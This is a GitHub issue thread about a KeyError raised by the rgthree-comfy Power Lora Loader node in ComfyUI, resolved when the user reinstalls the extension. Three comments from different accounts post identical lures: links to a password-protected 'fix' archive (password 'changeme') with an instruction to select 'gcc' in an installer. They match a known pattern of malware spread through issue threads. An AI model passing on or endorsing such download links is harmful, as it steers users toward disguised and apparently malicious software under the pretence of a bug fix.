### ISSUE TITLE
Executing gives error with Power Lora Loader (PowerLoraLoaderHeaderWidget)

### ISSUE THREAD

**Issue by tman1980** [rgthree/rgthree-comfy#313]
After updating to latest version i get this error when using Power Lora Loader. I have updated all nodes and comfyui to the latest, tested with other lora loaders (they work) but as soon as i put this in i get error. I have tried to find information about this but i have come up blank so i am now reporting this since i cannot find the solution.

```typescript
!!! Exception during processing !!! 'PowerLoraLoaderHeaderWidget'
Traceback (most recent call last):
  File "C:\AI_Tools\ComfyUI_windows_portable\ComfyUI\execution.py", line 276, in execute
    input_data_all, missing_keys = get_input_data(inputs, class_def, unique_id, caches.outputs, dynprompt, extra_data)
  File "C:\AI_Tools\ComfyUI_windows_portable\ComfyUI\execution.py", line 96, in get_input_data
    input_type, input_category, input_info = get_input_info(class_def, x)
  File "C:\AI_Tools\ComfyUI_windows_portable\ComfyUI\comfy_execution\graph.py", line 66, in get_input_info
    input_info = valid_inputs["optional"][input_name]
KeyError: 'PowerLoraLoaderHeaderWidget'

Prompt executed in 9.46 seconds
```

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ZYliang-hub** [comment]
I get the same error  !

**Comment by ZYliang-hub** [comment]
i update the rgthree nodes , then it's get ok .

**Comment by rgthree** [comment]
This seems to be working for me and I don't see how this error could happen unless something else (in comfy or another extension) was overwriting the options for Power Lora Loader.

Have you installed any new extensions, especially ones that may mess around with nodes' inputs?

**Comment by tman1980** [comment]
After uninstalling it and reinstalling it with the todays release it's now working fine for me. I do not know what caused it only that it's now solved.
